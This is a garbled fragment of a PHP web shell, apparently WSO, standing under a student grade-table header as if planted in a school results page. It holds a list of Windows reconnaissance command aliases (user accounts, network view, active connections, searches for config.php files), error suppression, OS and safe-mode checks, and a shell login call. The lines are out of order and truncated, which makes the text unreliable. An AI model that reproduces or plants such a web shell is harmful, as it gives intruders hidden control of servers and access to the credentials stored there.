Student Name Roll No. Reg. No Course Name Gread Point
"ARP Table" => "arp -a"
"Show computers" => "net view"
"User accounts" => "net user"
"Show running services" => "net start"
"Show active connections" => "netstat -an"
"Find *config*.php in current dir" => "dir /s /w /b *config*.php"
"Find index.php in current dir" => "dir /s /w /b index.php"
"List Directory" => "dir"
$aliases = array(
}
$cwd = str_replace("\"
$home_cwd = str_replace("\"
$cwd = @getcwd();
$home_cwd = @getcwd();
error_reporting(0);
if(!$safe_mode)
else
if(strtolower(substr(PHP_OS
}
wsoLogin();